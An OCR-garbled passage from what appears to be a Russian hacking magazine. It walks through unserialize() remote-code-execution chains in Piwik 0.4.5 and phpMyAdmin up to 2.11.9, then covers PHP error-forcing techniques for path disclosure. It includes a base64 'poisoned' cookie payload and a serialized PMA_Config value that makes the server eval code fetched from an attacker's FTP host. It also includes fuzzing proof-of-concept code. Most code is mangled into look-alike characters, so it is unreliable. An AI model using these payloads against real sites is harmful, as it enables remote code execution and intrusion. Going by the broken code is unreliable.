мию "ІпФѵѵогШ Воззіе АѵѵагсГ как лучшее опенсорсное программное 
обеспечение. Я могу еще долго описывать все преимущества скрипта, 
но настало время рассказать о природе ипзегіаііге бага в Ріѵѵік. 

гт ркамеѵѵорк 

Как ты уже знаешь, Стефан Эссер в своей презентации приводил 
теоретические примеры выполнения произвольного РНР-кода в 2епб 
Ргатеѵѵогк и писал о том, что сам фреймворк не подвержен уязвимо- 
сти — уязвимы лишь те приложения, которые его используют вкупе с 
недостаточной проверкой данных в функции ипзегіаІігеО. 

Как оказалось, Ріѵѵік как раз-таки и является тем самым приложением :) 
Теперь давай проследим за реверсингом скрипта, который провел сам 



Эссер (качай по ссылке в сносках последнюю уязвимую версию 0.4.5 
из архива релизов]. 

Открывай файл ,/соге/Соокіе.рбр и находи следующую функцию: 

ргоДесДес! ДипсДіоп ІоасІСопДепДРготСоокіе ( ) 

{ 

$соокіеЗДг = $_СООКІЕ [ $Йііз->паше] ; 

$ѵа1иез = ехріосіе ( 

зеі Д : :ѴАЫШ_ЗЕРАКАТОК, $соокіеЗДг) ; 

ДогеасЬ ( $ѵа1иез аз $пашеѴа1ие) { 

ІД ( ! із_пишегіс ( $ѵагѴа1ие) ) { 

$ѵагѴа1ие = Ъазе64_с1есос1е ( $ѵагѴа1ие) ; 

// зоше оД Дке ѵаіиез шау Ье зегіаіігесі 
аггау зо ѵѵе Дгу До. . . 

ІД( ( $аггауѴа1ие=@ипзегіа1І2е ( $ѵагѴа1ие) ) 

! ==Да1зе 

// Ѵ7е зеД Дке ипзегіаіігесі ѵегзіоп опіу 
Дог аггауз . . . 

&& із_аггау ( $аггауѴа1ие) 

) 

{ 

$ѵагѴа1ие = $аггауѴа1ие; 

} 

} 
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первоначальное асіѵізогу в рЬрМуАсІтіп 



Как видно, здесь Пивик получает контент из куков, кото- 
рые передает пользователь, и разбирает их на запчасти: 

• значение кукиса разбивается по знаку "=", первая часть 
— имя переменной, вторая — значение; 

• далее значение переменной пропускается через 
Ьазе64_бесобе(] (что, кстати, помогает безболезненно 
передавать нулл-байт) и через нужную нам функцию 
ипзегіаІкеО. 

Эта функция юзается практически в любом месте скрипта 
(например, для авторизации по кукам] и доступна любому 
удаленному пользователю, так что нам осталось толь- 
ко найти путь к опасным функциям в 2епб Ргатеѵѵогк. 
Двигаем дальше :) 

РЕВЕРСИНГ 

Если ты читал оригинальный РЭЕ Эссера, то должен 
помнить, что наиболее удобным классом для выполнения 
произвольного кода во фреймворке является 2епб_І_од. 
Так что ищем и находим этот класс в ./ІіЬз/2епсІ/І_од.рЬр и 
смотрим на его деструктор: 

риЫіс РипсРіоп кезРгисР ( ) 

{ 

Рогеаск ( $Ркіз->_ѵпгіРегз аз $шгіРег) { 
$ѵѵгіРег->зкиРс!оѵт ( ) ; 

} 

} 

Здесь деструктор в цикле выполняет некий метод 
зЬиібоѵѵпО из классов, перечисленных в массиве щл/гбегз. 
Далее нужно найти полезный нам зЬиібоѵѵп-метод. И 
таковой находится в ./ІіЬз/2епб/Еод/ѴѴгі1:ег/Маі1.рЬр: 

риЫіс РипсРіоп зкиРсІоѵт ( ) 

{ 

ІР (етрру ( $Ркіз->_еѵепРзТоМаі1 ) ) { 

геРигп; 

} 

ІР ( $Ркіз->_1ауоиР) { 

// ІР ап ехсерРіоп оссигз сіигіпд 
гепсіегіпд, сопѵегР ІР Ро а поРісе 

// зо те сап аѵоісі ап ехсерРіоп 
Ркгоѵѵп ѵѵіРкоиР а зРаск Ргаше. 

Ргу { 

$Ркіз->_таі1->зеРВос1уНРт1 ( $Ркіз->_ 
1ауоиР->гепс1ег ( ) ) ; 

} саРск (ЕхсерРіоп $е) { 

Ргу { 

$Ркіз->_таі1->зепс1 ( ) ; 

} саРск (ЕхсерРіоп $е) { 






;^р 



установочный скрипт рЬрМуАсІтіп 



} 



Этот шатдаун-метод проверяет, есть ли некие события, 
которые еще не были отправлены по указанному в свой- 
стве адресу е-таіі. Если такие находятся, то он отправля- 
ет их. Эта фича позволяет любому взломщику рассылать 
спам через тот же самый ипзегіаіке-баг. 

Спам-баг, конечно, может быть интересен определенному 
кругу читателей, но мы со Стефаном не останавливаемся 
на достигнутом и идем дальше :). Теперь нам необходимо 
найти классы, использующие метод гепбег. Наиболее 
полезный из таковых оказывается в классе Ріѵѵік_Ѵіеѵѵ из 
файла ./соге/Ѵіеѵѵ.рбр: 

риЫіс РипсРіоп гепсіег ( ) 

{ 

ргу { 

} саРск (ЕхсерРіоп $е) { 

// сап Раіі, Рог ехатріе аР 
іпзРаІІаРіоп (по ріидіп Іоасіесі уеР) 

} 

геРигп $Ркіз->зтагРу->РеРск ( $Ркіз- 
>Ретр1аРе) ; 

} 

Как пишет сам Эссер, этот метод делает кучу интересных 
вещей, которые могут быть проигнорированы, и в конце 
вызывает известный шаблонный движок 5таг1:у для рен- 
деринга темплейта. 

ОПАСНЫЙ ЗМАПТѴ 

Известно, что Этагіу может выполнять РНР-код в тем- 
плейтах, поэтому мы и выбрали для дальнейшего иссле- 
дования этот класс. 

Итак, смотрим на указанную выше функцию іеісЬО в ./ІіЬз/ 
ЗтаНу/Зтагіу.сІазз.рбр: 

РипсРіоп РеРск ( $гезоигсе_пате , $саске_Ы = 
пиіі , ...) 

{ 

ІР ($Ызр1ау && ! $Ркіз->саскіпд && 
соипР ( $Ркіз->_р1идіпз [ ' оиРриРРіІРег ' ] ) = = 

0 ) { 

ІР ( $РЪ.із->_із_сотрі1ес1 ( $гезоигсе_ 
пате, $_зтагРу_сотрі1е_раРк) 

I I $Ркіз->_сотрі1е_ 

гезоигсе ( $гезоигсе_пате , $_зтагРу_сотрі1е_ 
раРк) ) 

{ 

іпсіисіе ( $_зтагРу_сотрі!е_раРк) ; 



гфЬіі 
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• зіѵѵік.оп —офици- 
альный сайт Ріѵѵік 

• у .ріѵѵі к.огд/7 
С=М ;0=Р — архив 
релизов Ріѵѵік 

• 5Ц5реккогд/2009/ 

1 2/09/абѵізогу- 
032009-ріѵѵік- 
соокіе-ипзегіаііге- 
ѵиіпега — Ріѵѵік 
Соокіе ипзегіаІігеО 
Ѵи Іпега Ьі Іііу 

• Ітатеѵѵогк.гепб. 
)т/боѵупІоаб — офи- 
циальная страница 
2епб Ргатеѵѵогк 

• зтагіу.пеі — 
официальный сайт 
ЗтаНу 

• рбр.пеіУсаІІ игег 
Іипс аггау — опи- 
сание функции саІА_ 
изег_1ипс_аггау(] 

• зизрекРогд/ 
боуѵпІоабз/Ріѵѵік 
ЗтагЩхі — выпол- 
нение произвольного 
кода в Ріѵѵік через 
ЗтаНу 
• зизрекРогд/ 
боуупІоабз/Ріууік 
Сопбд.М — запись 
произвольных фай- 
лов в Ріѵѵік 

• дписіЫеп.огд/ 
зІабс/Ыод/2009/06/ 
рбртуабтіпгсезЬ. 
М— рбрМуАбтіп 7 
зсгіріз/зеіир.рбр' 

РНР Собе Іщесбоп 
РСЕРоСѵО.11 

• зпіррег.ги/ѵіеѵѵ/1 2/ 
рбртуабтіп- 

21 1 9-ипзегіаІІ2е- 

агЬИтагу-рбр-собе- 

ехесиРоп-ехрІоіІ: 

— мой ЭКСПЛОЙТ для 

рбрМуАбтіп <= 2.1 1 .9 

• Ьгит.апРсбаРги/ 
кэгеаб99589-б[е 
ехізІз.ЫтІ — обход 
ограничений Рі 1е_ 
ехізіз с помощью кр 
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бітезбатр 

к ( $рагатз [ ' деб_зоигсе ' ] ) 

{ 

$_зоигсе_гебигп = 
іззеб ( $бЪ.із->_р1идіпз [ ' гезоигсе 1 ] 
[ $_гезоигсе_буре] ) && са11_ 

изег_бипс_аггау ( $іЬіз->_ 
ріидіпз [ 1 гезоигсе ' ] [ $_гезоигсе_ 
буре] [0] [0] , аггау ( $_гезоигсе_ 
пате, &$рагатз [ ' зоигсе_сопбепб 1 ] , 
&$Шз) ) ; 



асіѵізогу к Пивику отСтефана 
Эссера 

} 

} еізе { 

Здесь имя шаблона подставляется в метод 
_сотріІе_ге5оигсе для компиляции: 

бипсбіоп _сотрі1е_гезоигсе ( 
$гезоигсе_пате , 

$сотрі1е_рабб0 

{ 

$_рагатз = аггау ( ' гезоигсе_пате ' 
=> $гезоигсе_пате) ; 

іі ( ! $бМз->_бебсЬ._гезоигср_ 
іпбо ( $_рагатз ) ) 

{ 

гебигп баізе; 

} 

Перед компиляцией методом _1е1сб_ 
гезоигсе_іп1ю получается расширенная 
информация о ресурсе: 

бипсбіоп _бебс1і_гезоигсе_іпбо ( 
&$рагашз) 

{ 

зѵѵібсЪ. ( $_гезоигсе_буре) { 
сазе ' бііе ' : 

Ьгеак; 
сіебаиіб : 

// саіі гезоигсе бипсбіопз 
Со бебсЪ. бке бетріабе зоигсе апсі 



} 

Бинго! С помощью стандартной РНР-функции 
саІІ_изег_!ипс_аггау мы сможем выполнить 
любую другую саІІЬаск-функцию :). 

ВЫПОЛНЕНИЕ КОДА 

В данном примере функция саи_изег_^ипс_ 
аггау вызывается с двумя параметрами: имя 
вызываемой саІІЬаск-функции и массив с 
тремя параметрами, которые передадутся в 
коллбэк. 

В контексте выполнения произвольного РНР- 
кода здесь сразу встают две проблемы: 

1. еѵаК), обычно применяемый для сабжа, 
является конструкцией языка, а не функци- 
ей, то есть его невозможно вызвать через 
саи_изег_іііпс_аггау; 

2. аззегШ (как замена еѵаі] уже является 
функцией, но ее вызов выдаст ошибку, так 
как коллбэку передаются 3 параметра, а 
аззегі принимает лишь один. 

Из-за этих ограничений Стефану пришлось 
придумать небольшой трюк, который заклю- 
чается в использовании встроенного в 
Зппагіу враппера для еѵаі: 

бипсбіоп _еѵа1 ( 

$сос1е, $рагатз=пи11) 

{ 

гебигп еѵаі ($сос!е) ; 

} 

Хотя эта функция по определению принимает 
лишь 2 параметра, ей возможно передать и 
большее их количество. 



Причиной этого является тот факт, что по 
дефолту пользовательские функции в РНР, 
в отличие от внутренних, могут оперировать 
произвольным числом параметров. 

Теперь нам осталось лишь собрать в еди- 
ный эксплойт все результаты реверсинга, 
что Стефан Эссер уже сделал (ссылку ищи в 
сносках]. 

В сплойте сериализуются все перечисленные 
выше классы и необходимые им методы, 
затем полученное значение пропускается 
через Ьазе64_епсобе и, на основе его, фор- 
мируется еѵіі-кукис, который ты сможешь 
скормить своему браузеру и наслаждаться 
результатами выполнения произвольного 
РНР-кода в Ріѵѵік. 

Также советую обратить внимание на еще 
один эксплойт по ссылке в сносках, где Эссер 
проворачивает еще один трюк с ипзегіаііге в 
Пивике и записывает произвольные файлы в 
произвольное место системы. 

ПОТРОШИМ РНРМУАОМШ 

Теперь небольшой бонус от меня :). 

Если ты следишь за лентами эксплойтов, 
то, наверняка, не должен был пропустить 
уязвимость популярнейшего менеджера 
баз данных МуЭдІ рбрМуАбтіп версий до 
2.1 1 .9 (ссылку на сплойт, как всегда, ищи в 
сносках]. Уязвимость заключалась в том, что 
скрипт установки ./зсгіріз/зеіир.рбр вообще 
не проверял пользовательские данные, 
которые затем записывались в конфигура- 
ционный файл. Эксплойт был всем хорош, 
за исключением того, что администратор 
уязвимого хоста должен был вручную соз- 
дать директорию ./сопбд и дать ей права на 
запись (именно туда должен был записы- 
ваться ядовитый конфиг], что на практике 
встречалось крайне редко. Настало время 
исправить это недоразумение. 

Итак, ./зсгірІз/зеІир.рЬр — единственное 
место в скрипте, где используется наша 
любимая функция ипзегіаіке: 

іб (іззеб ( $_Р08Т [ 1 сопбідигабіоп ' ] ) 
&& $асбіоп != ' сіеаг') 

{ 

// СгаЬ ргеѵіоиз 
сопбідигабіоп, іб іб зіюиісі поб 
Ье сіеагесі 

$сопбідигабіоп=ипзегіа 1 І 2 е ( 
$_Р08Т [ 1 сопбідигабіоп ' ] ) ; 

} 

Как можно видеть, параметр $_ 
РОЭТІ'сопбдигаІіоп'] перед вставкой в 
ипзегіаІкеО никоим образом не проверяется, 
так что мы вполне можем поискать инте- 
ресные реализации волшебных методов 

ѵѵакеир и сіезітисб Очень полезный нам 

вэйкап-метод находится в ./ІіЬгагіез/Сопбід. 
сіазз.рбр: 

бипсбіоп ѵѵакеир ( ) { 

іб (! $бкіз->скескСопбідЗоигсе ( ) 
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СФокіе: рішк_ 

ішіЫ^УТ^ОйгрО;А7Тх^ОьГа™5кЖ()хѵ^І6Ш>7сгм^оІАСоАХЗ<іуйХКІ(^ 

ТОрЬабтр?тбША^!^яАІ=9:таѵаХОіО036І^бШра2ігХі^2:ХсЮі!6еЗМ6МіАадраХфаі9^атЗ.ШШЬХВ5ѴХРиі^^^сОѵ6с6ЫаѴ/5тЬузрО2Ерг$ е рОуП. 

xо^Ю^оі^^Бр^ЖС12ргXсА С г1^лI^5Г^ФО^ЕуШ^^фа^тТОуаНк^0^^6сЗМ60^оіXЗБ5^/фЬIМ02Н6Шр7с^^Шу2XN V Ш^2ШтуОпи:О^М$I^іа1^ЬСПУТоЮ п ^рО^А7V 

ОІА7туОпірОІА7сі^02кШ^ОІЩІ]91гітЫіШ:іЮіБЮІЬаХ&ѵ<ЩЬ»атасіПт^ 

О^ТѴтбаѴ,Г5пІ : ьО>/.7сгохШоі2т9уУ2 ѴП г 2^^а 5 25Г7 У]окО3 1 9сіо^іАСоАХ2 Ѵ22\У5Сс ІКѵТѴІРрЬСГ7 УТоЮлГр(ЩА7аТохОЗ 1 ЮДуООАК^ГсЗѴ^^аРБуг^ІЬггіРЛ^ОІ/ 
ЕѴ/к6Ш>йОіЕ7ЕО= 



ядовитые кукисьір позволяющие вывести на экран рЬрШйІ) дРіѵѵік 



I I $ікіз->зоигсе_тііте != = 
іііетііте ( $іЪ.із->деіЗоигсе ( ) ) 

I I $іЬіз->сіеіаи1і_зоигсе_тііте !== 
іііетііте ( $ікіз->с1еіаи1і_зоигсе) 

I I $іМз->еггог_сопіід_іііе 
I I $іМз->еггог_сопіід_сІеіаи1і_іі1е) { 
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$ікіз->зеіііпдз = аггау ( ) ; 



ядовитые кукисы сделали свое дело : 



$іЪ.із->1оас! ( ) ; 



§і1ііз->сЬ.еск8у8іет ( ) ; 

} 



} 

В данном методе происходит много чего интересного, но 
сейчас нас интересует функция ІоасіО . Находим ее в том 
же файле: 

іипсііоп Іоасі ( $зоигсе = пиіі) 

{ 



іі (! $ікіз->скескСопіід5оигсе ( } ) { 

геіигп іаізе; 

} 

ІІ ( іипсііоп_ехізіз ( ' іііе_деі_сопіепіз 1 ) ) 
{ 

$еѵа1_гези1і = еѵа1('?>' . 

ігіт ( іі1е_деі_сопіепіз ( 
$іЬ.із->деіЗоигсе ()))); 

} еізе 
{ 

$еѵаі_гези1і = еѵа1('?>' . 

іг іт ( ітріосіе ( " \п" , 

іііе ( $ікіз->деіЗоигсе ( ) ) ) ) ) ; 

} 



} 



сііе ( 1 Ехізііпд сопіідигаііоп іііе (' . 

$іМз->деі8оигсе ( ) . * ) іа поі геасіаЫе.'); 

} 

$регтз = ©іііерегтз ( $іЪ.із->деіЗоигсе ( ) ) ; 
іі (!($регтз === іаізе) && ($регтз & 2)) 

{ 



сііе ( ЧлЦгопд регшіззіопз оп сопіідигаііоп 
іііе, зіюиісі поі Ье члгогісі шгііаЫе ! ' ) ; 

} 

геіигп ігие; 

} 

Последний метод выполняет всяческие проверки с тем 
файлом, который, по идее, должен быть конфигурацион- 
ным. Функции ЯІе_ехІ5Ы), із_геасІаЫе(] и ГіІерегтзО изна- 
чально были призваны помешать вставить в нужный нам 
КІе_деі:_соп{епІ5() удаленный ИРИ с РНР кодом на выпол- 
нение. Здесь кроется один нюанс. Начиная с РНР 5, все 
перечисленные функции вполне отлично работают с про- 
токлом Ир, то есть конструкция вида і і 1е_ех і зіз ( ' іі р ://і1: р . со т/ 
зЬеН.ЪФ) вернет Ігие. С обычным Ьйр нам вряд ли бы такое 
удалось. Исходя из всего написанного выше, уже можно 
составить ядовитое значение, которое будет передаваться в 
ипзегіаіке, для уязвимого параметра $_Р05Т['сопбдигабоп'] 
(устанавливаем только свойство "зоигсе"]: 

0:10: " РМА_Сопіід" : 1 : { з : б : " зоигсе" ; з : 70 : " Іі 
р : //1одіп:раззѵ\гогс1@іѵоу_Ъ.озі . сош/ѵ^пл?/зЬ.е11 . 




Советую прочитать 
отличную заметку на 
тему нашей статьи 
в блоге ПагОг'а аг 
пате/оЬгогу/поѵуе- 
зрозоЬѵ-оЬхосІа-ууаІ- 
і-рбр-екзріоііу . Тут 
ты также найдешь 
неплохой анализ 
ипзегіаіке-бага 
в нелицензионных 
версиях форума 
ѵВиІАебп, который, 
к сожалению, по- 
зволяет выполнить 
лишь функции без 
параметров. 



Надеюсь, что ты увидел здесь еѵаі- конструкцию, которая 
позволит нам выполнить любой РНР-код и в которую мы 
сможем вставить все что угодно :). Сделать это позволит 
простенький метод деіЭоигсе и обход ограничений безо- 
пасности в методе сНескСопбдЗоигсе: 



іхі " ; } 

Чтобы вывести на экран рЬріпіоО, файл зЬеІііхІ: на твоем 
Ир-хосте должен иметь значение "<? рЬріпіоО ;ехМі; ?>" 
(ехіѣ; в конце обязательно, иначе скрипт вылетит с "Раіаі 
еггог"). Удобный эксплойт для этой баги также ищи в 
сносках. 



іипсііоп деіЗоигсе() { 
геіигп $ікіз->зоигсе; 

} 

іипсііоп скескСопіідЗоигсе ( ) { 

іі (! іі1е_ехізіз ( $ікіз->деі8оигсе ( ) ) ) 

{ 

геіигп іаізе; 

} 

іі ( ! із_геас!аЫе ( $іЪ.із->деі8оигсе ( ) ) ) { 



ЕРІС ѴШ 

Уязвимости, основанные не на невнимательности про- 
граммистов, а на особенностях самого РНР, о которых 
не все знают, набирают силу! С каждым днем их появ- 
ляется все больше и больше. Этот факт заставляет нас 
гораздо глубже анализировать свой (и чужой :] код и 
учиться лучше понимать саму природу информационной 
безопасности. А я надеюсь, что ты, изучив вместе со мной 
по шагам всю подноготную ипзегіаііге-бага от Стефана 
Эссера, сам захочешь принять участие в пентестинге 
известных движков. Увидимся в следующих номерах! тг 
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I Владимир сІОіпрр Воронцов Ьир://охосІ.ги 



ПОЛЬШИ. 

открои ли 1 ! 



ПОЛУЧЕНИЕ ИНФОРМАЦИИ О ВЕБ-ПР 
НЕТРАДИЦИОННЫМИ СПОСОБАМИ 



Сегодня я хочу рассказать тебе о некоторых осо- 
бенностях функционирования веб-приложений, 
которые могут повлиять на их безопасность. 
Прежде всего, предлагаю обратить внимание 
на различия между терминами «безопасность 
сайта» и «безопасность системы управления 
сайтом».Хотя эти вещи и взаимосвязаны, но, 
как показывает практика - они всего лишь 
пересекающиеся множества. Пентестер методом 
«черного ящика» может выявить недостатки 
СМ3, на которой этот работает сайт, а может и не 
выявить. Как повезет. 




НИКОГДА НЕ СДАВАЙСЯ 

Немного лирики... Однажды мне довелось 
исследовать одну очень хорошо защищен- 
ную систему. Мозговые штурмы следовали 
один за другим и ничего не приносили, идеи 
иссякали, а результат оставался практически 
нулевым. Я начал писать разнообразные 
фаззеры, дергая то один, то другой скрипт в 
надежде вытащить хоть что-нибудь, но все 
было без толку. Однако, крылатая фраза на 
спичечном коробке с цаплей и лягушкой, 
покорившем сердца многих наших соотече- 
ственников, оказалась как всегда безуко- 
ризненно верной. В куче ответов сервера 
на разнообразные запросы в глаза броси- 
лись ответы аномально маленькой длины. 
После более подробного их изучения стало 
ясно, что сервер периодически не успевал 
отрабатывать мои навороченные запро- 
сы за тах_ехеси1:іоп_1:іте и скрипт падал с 
500-м статусом. Это было уже что-то, так как 
в ошибке содержались абсолютные пути и 
имена скриптов на сервере. Выудив самый 
тяжелый для сервера запрос (им оказалась 
функция создания миниатюры из формата 



ТІРР], я поставил его в цикл в многопоточ- 
ном режиме и стал собирать информацию. 
Через непродолжительное время у меня 
были ответы 11 различных типов, каждый из 
которых раскрывал имя и путь к своему клас- 
су. Второй раз счастье улыбнулось в гугле, 
когда оказалось, что один из этих классов 
доступен для скачивания на просторах Сети. 
После изучения исходника были выявлены 
слабые места и проведена атака переопре- 
деления переменной с РедІ5Іег_ОІоЬаІ5=ОЫ. 
Подбирать имя этой переменной, не видя 
исходников, можно было годами... Движок 
сдался, а полезный опыт и побудил меня к 
написанию этой статьи. 

НАСТРОЙКИ РНР 

После такого дебюта сразу стало интересно 
найти другие возможные пути к проведению 
схожих атак. В настройках интерпретатора 
РНР были выделены следующие опции: 

тах_ехесиС і оп_Ь іше 
тах_іприС_пе з С і пд_1 е ѵе 1 
тах_іприС_Ь іше 



тетогу_1 ітіС 

рсге . ЬаскСгаск_1ітіЦ ( РНР>=5 .2.0) 
рсге . гесигзіоп_1ітік ( РНР>=5 .2.0) 
розк_тах_зІ 2 е (РНР>=4.0.3) 
ир1оасі_тах_5і1езІ2е 
тах_Ті1е_ир1оас1з ( РНР>=5 . 2 . 12 ) 

Здесь не все, но наиболее распространен- 
ные опции, что называется соттоп :). Весь 
список опций (включая различные модули] 
можно найти на рЬр.пеі/тапиаІ/еп/іпі.ІізІ:. 
рбр . Искать по ключевым словам тах, Іітіі 
Из всех параметров следовало выявить наи- 
более применимые. Тут я руководствовался, 
прежде всего, универсальностью: хотелось 
найти параметры, которые удастся компро- 
метировать на как можно более широком 
спектре настроек РНР и веб-серверов. После 
долгих мучений, описывать которые здесь 
не буду, оказалось, что самые пригодные 
к использованию — тах_ехесибоп_бте, 
тетогу_ІітіТ Они выбрасываются в тело 
ответа при настройках еггог_героіііпд=Е_ 
ЕРРОР или выше, и бІ5рІау_еггог5=Оп. 

Такое можно встретить в большинстве дефолт- 
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Г рафик зависимости размера ответа от 
размерности массива переменной ѲЕТ. По 
спаду определяем тах_іприІ_пе5ііпд_ 
Іеѵеі. 

ных конфигов. Кроме того, варьируя значения переменных, 
можно добиться выпадания ошибок из различных мест 
приложения. В результате мы получим не только названия 
классов, скриптов, пути к приложению, но и понятие об 
иерархии вызовов внутри приложения. Но это еще не все 
данные, которые нужно иметь для начала работы. 

ПОДГОТОВИТЕЛЬНЫЙ ЭТАП - Ш МАХ ШГСТН 
И МАХШРІІТМЕ8Ш6І.ЕѴЕІ. 

Для начала напишем простые скрипты для определения 
двух параметров сервера — максимальной длины ОЕТ- 
запроса и максимальной глубины вложенности входных 
данных. Зачем они пригодятся, будет рассказано дальше. 
Максимальная длина запроса устанавливается веб- 
сервером, определить ее очень просто методом дихото- 
мии (деления отрезка пополам]. Код на РНР выглядит 
примерно так: 

^ипсСіоп ^и 22 _шах_игі_ 1 еп ( $иг1 ) 

{ 

$Ьеас1егз = аггау ( ) ; 

$с!аСа = аггау () ; 

$1еЕС = 500; //Значение левого края иско- 



мого диапазона 

$гідЫ: = 64000 ; //Значение правого края 
искомого диапазона 

$ассиг = 5 ;/ /Точность , с которой определя- 
ем значение 

ѵтЬіІе ( ( $гідІЩ-$1еі:Ц ) > $ассиг) { 

$сиг = ( $гід]тС + $1е^С ) /2 ; 

$<ТаСа[ , х'] = зСг_гереаС("х ,, ,$сиг); 

ІізС ( $Ъ. , $с , $Т ) = зепсЮеСКедиезС ( $шг1 , 

$1іеас1егз , $с1аЦа) ; 

$з = іпРѵаІ ( зиЬзСг ( $Ъ., 9 , 3 ) ) ; 

ІЕ ( $з<400 ) { 

$1е^С=$сиг ; 

} 

е1зе{ 

$гідІЩ = $сиг ; 

} 

есЬо " \п$сиг\С$з " ; 

} 

геСигп ( ( $гідНШ + $1е:ЕЦ ) /2 ) ; 

} 



Второй необходимый параметр тах_іпрЩ_пе5І:іпд_ІеѵеІ 
— свойство уже строго настройки интерпретатора, по 




Ошибка тах ехесиііоп Ііте 



умолчанию равен 64. Это значение определяет макси- 
мальную размерность массива, которую может иметь 
переменная, приходящая от пользователя. Рассмотрим 
для примера вот такой код: 

<?рЬр есНю $_СЕТ['а']; ?>. 

В случае, если, тах_іприІ_пе5І:іпд_ІеѵеІ=1 и мы пере- 
дадим в запросе ?а[][], на экране ничего не появится, 
в интерпретаторе возникнет ошибка уровня ІМобсе, 
говорящая о том, что переменная не объявлена. Если 
же мы увеличим значение параметра до 2 и повторим 
запрос, на экране уже высветится «Аггау». Казалось бы, 
именно таков самый простой способ определить значе- 
ние этого параметра — найти скрипт, который в явном 
виде выводит значение какой-нибудь пользовательской 
переменной и вызывать его, увеличивая вложенность, 
пока не исчезнет надпись Аггау. Такой поиск опять-таки 
стоит проводить методом дихотомии. Однако я попытал- 
ся написать более универсальный алгоритм, который 
будет работать даже в случае, когда в ответ выводятся 
переменные, только косвенно зависящие от пользо- 
вательской. До сих пор не уверен в оптимальности 
выбранного алгоритма, так что представляю его на суд 
общественности :]. Суть в том, чтобы постепенно увели- 
чивать значение размерности массива и анализировать 
количество байт ответа. Если длина ответа отличается 
от предыдущего больше чем на какое-то пороговое 
значение, это считается аномалией и фиксируется в 
логе. Дополнив мой РоС нехитрой функцией построения 
графиков, я получил интересные картинки, которые 
представлены в сносках. В большинстве случаев, по 
спаду графика зависимости размера ответа от размер- 
ности массива и определяется значение параметра. 

Этот алгоритм пригодился мне и в дальнейшем, плюс я 
написал аналогичный статистический анализатор для 
времени ответа сервера. 

ЧРЕЗМЕРНОЕ УПОТРЕБЛЕНИЕ 
ПАМЯТИ ВРЕДИТ ВАШЕМУ СКРИПТУ :) 

Вернемся к нашей святой цели — спровоцировать ошибку 
«АІІоѵѵесІ тетогу 5Іге ехЬаизІесІ». В качестве самого триви- 
ального примера, рассмотрим РНР-код <?рбр есбо ‘0К’;?>. 
Казалось бы, какое тут потребление памяти?! На самом 
деле, такой скрипт может жрать мегабайты ОЗУ. И тут, не 
спорю, нет вины программиста, написавшего его. Для 
вывода размера используемой памяти в РНР служит 




НТТР://ѴѴѴШ 



1 I 

> Ііпкз 

— мой блог, 
отвечаю на вопросы, 
пишу по мере сил. 
рЬр.пеі — официаль- 
ный сайт интерпрета- 
тора, сюда за параме- 
трами конфига. 
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} 

гекигп іпкѵаі ( $тет) ; 



■ > 




Пример РоС в работе. Первая ко- 
лонка — размер ответа, вторая — 
время ответа, третья — итерация 
в потоке. Трудятся 20 потоков. 



функция тетогу_де1:_и5аде(]. Предлагаю 
дописать ее к тривиальному скрипту и про- 
вести некоторые измерения. Для начала 
вызовем наш скрипт не с переменной, а 
методом 6ЕТ. Потребление возрастет где-то 
на 1 Кб. Интерпретатор уже выделил немного 
памяти под значение переменной, поэтому, 
если послать запрос «?а=ааа», потребление 
памяти не увеличится. Наша же задача — 
получить как можно больше выделенной 
памяти при как можно более короткой длине 
СЕТ-запроса (максимальное значение мы 
уже получили и держим в уме]. Попробуем 
теперь передать запрос с параметром ?а[], 
количество потребленной памяти увели- 
чится уже примерно на 500 байт. Теперь в 
игру вступает второй параметр, который был 
определен выше — тах_іприІ_пе5І:іпд_1.еѵеІ. 



<?р!ір есТю "тагкег : " .тешогу_деС_ 
изаде ( ) . "#" ; ?> 

и добавить его в директиву аи1:о_аррепс1_б1е 
в рбр.іпі. Теперь нетрудно написать функ- 
цию, которая будет искать в ответе сервера 
маркер и получать значение потребляемой 
памяти. Функция будет такая: 

ПипсРіоп ІіпсІМагкег ( $сопРепР ) 

{ 

$р1 = зкгроз ( $сопРепР , 

"СЖзес Е500 теш:"); 

ІТ ( $р1===Па1зе) { 
гекигп 0 ; 

} 

еізе { 

$р2=зкгроз ( $сопкепк , " # " , $р1 ) ; 
іі ( $р2===^а1зе) { 
гекигп 0 ; 

} 

еізе { 

$тет = зиЬзкг ( $сопРепк , 

$р1+15 , $р2-$р1-15 ) ; 



Г рафик зависимости времени ответа от размерности массива пере- 
менной 6ЕТ. Как видно, зависимость определяется далеко не размер- 
ностью массива :) 

Как только размерность нашего массива 
превысит его, потребление памяти будет 
равносильно случаю, когда мы вообще ниче- 
го не передаем. Для эксперимента я про- 
верил, сколько же памяти будет потреблять 
тривиальный скрипт, если нет ограничения 
на размерность массива. Оказалось, что при 
запросе ?а([]х2500 раз] тривиальный скрипт 
ест около 1.2 Мб. Этого, конечно, слишком 
мало, чтобы вывалиться за тетогу_бтК, 
но и скрипт наш не похож на реальное веб- 
приложение. Чтобы мониторить потребление 
памяти любого приложения, можно написать 
очень простой скрипт: 



Теперь мы можем попытаться получить 
практическую пользу от всего написанного. 
Тут следует запастись удачей. Навскидку, 
без исходного кода, может быть непросто 
определить скрипты, которые любят память. 
Совет такой — ищи циклы с обработкой мас- 
сивов, рекурсии и всего такого же плана. В 
ряде случаев может оказаться, что лучшеи- 
спользовать РОСТ, где существенно больше 
ограничения на длину передаваемых данных. 
Советую взять с диска мой РоС и посмотреть 
функцию Іи22_тетогу_и5аде(]. Ее можно 
использовать для перебора переменных раз- 
личными методами (РОСТ, СЕТ, МиШрагІ:] и 
для выявления наиболее выгодных для выде- 
ления памяти комбинаций. Там же встроена 
проверка на аномальные длину и время 
ответа, так что, если долгожданная ошибка 
появится, ты ее не пропустишь. 

МЕДЛЕННЫЙ СКРИПТ - 
УЯЗВИМЫЙ СКРИПТ 

В отличие от потребления памяти, время 
выполнения скрипта зависит от нагрузки на 
сервер и вообще является величиной, мягко 
говоря, непостоянной. Заставить приложе- 
ние отрабатываться дольше, чем указано в 
параметре тах_ехеси!:іоп_1;іте, непросто. 
Есть даже класс уязвимостей в 0ѴѴА5Р, 
называется «беасІ_собе». Это ошибки раз- 
работчика, которые можно эксплуатировать 
в целях взлома, например, для прово- 
цирования ошибки превышения времени 
выполнения. Тестируя приложение или сайт, 
ты уже имеешь какое-то представление о 
том, какие запросы отрабатывают быстрее, 
а какие медленнее, чем другие. Это, опять 
же, всевозможные циклы. Кстати, фильтры 
безопасности часто грешат медленной ско- 
ростью выполнения. Особенно это касается 
фильтров, исправляющих запрос. Зная 
как работает фильтр, можно скормить ему 
запрос, для приведения которого потребует- 
ся много итераций. 

Кроме того, опасны операции с файлами, 
например, злоумышленник может попро- 
бовать загрузить большой файл в несколько 
потоков. Если веб-приложение попытается 
записать файл в то же место, куда еще не 
